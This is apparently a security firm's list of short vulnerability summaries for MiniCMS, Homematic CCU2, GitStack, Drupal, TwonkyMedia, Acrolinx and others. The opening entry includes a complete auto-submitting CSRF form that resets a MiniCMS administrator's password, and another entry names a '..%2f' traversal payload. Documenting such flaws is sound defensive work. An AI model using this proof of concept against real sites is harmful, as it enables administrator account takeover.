There is a CSRF vulnerability that can change the administrator account password. After the administrator logged in, open the following page: poc: <html> <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312"> <title>test</title> <body> <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post"> <input type="hidden" name="site_name" value="hack123" /> <input type="hidden" name="site_desc" value="hacktest" /> <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" /> <input type="hidden" name="user_nick" value="hack" /> <input type="hidden" name="user_name" value="admin" /> <input type="hidden" name="user_pass" value="hackpass" /> <input type="hidden" name="comment_code" value="" /> <input type="hidden" name="save" value=" " /> </form> <script> document.forms[0].submit(); </script> </body> </head> </html>
The Homematic CCU2 is vulnerable to an arbitrary file write vulnerability. This vulnerability allows an attacker to write arbitrary files to the file system of the Homematic CCU2. This vulnerability is due to the lack of authentication when sending requests to the Homematic CCU2 API. An attacker can exploit this vulnerability by sending a specially crafted request to the Homematic CCU2 API.
This module exploits a remote code execution vulnerability that exists in GitStack through v2.3.10, caused by an unsanitized argument being passed to an exec function call. This module has been tested on GitStack v2.3.10.
This exploit is a proof of concept for a pre-authentication SQL injection vulnerability in Drupal. It allows an attacker to gain access to a Drupal site without authentication by exploiting a vulnerability in the way Drupal handles session cookies. The exploit works by sending a specially crafted cookie to the server, which contains an SQL injection payload. The payload is then executed by the server, allowing the attacker to gain access to the site.
It was observed that attacker is able to inject a malicious script in the Application. As server is not filtering the inputs provided by an attacker and the script executes in the victim browser when he tries to visit the page.
Once modified, systems use foreign DNS servers, which are usually set up by cybercriminals. Users with vulnerable systems or devices who try to access certain sites are instead redirected to possibly malicious sites. Modifying systems' DNS settings allows cybercriminals to perform malicious activities like steering unknowing users to bad sites, replacing ads on legitimate sites, controlling and redirecting network traffic, and pushing additional malware.
Invitation.msrcincident file contains an XML document with a DOCTYPE declaration that references an external entity. This external entity is used to include the contents of a file from the local system. The xxe.xml file contains an entity that is used to include the contents of the win.ini file from the local system.
TwonkyMedia Server 7.0.11-8.5 is vulnerable to persistent XSS. The vulnerability exists in the web UI of the TwonkyMedia Server. An attacker can inject malicious JavaScript code into the web UI of the TwonkyMedia Server. The malicious JavaScript code will be executed in the browser of the user who visits the web UI of the TwonkyMedia Server. The vulnerability can be exploited by sending a specially crafted HTTP request to the TwonkyMedia Server.
TwonkyMedia Server 7.0.11-8.5 is vulnerable to directory traversal, which allows an attacker to read arbitrary files on the system with the web server privileges. The vulnerability exists due to insufficient validation of user-supplied input in the "getfile" parameter of the "/rpc/get_file" script. A remote attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. "..%2f") to read arbitrary files on the system with the web server privileges.
Acrolinx dashboard windows works on the server. An attacker can exploit this vulnerability by sending a crafted request to the server. The crafted request contains a directory traversal payload which allows the attacker to access the windows win.ini file.
Services By CQR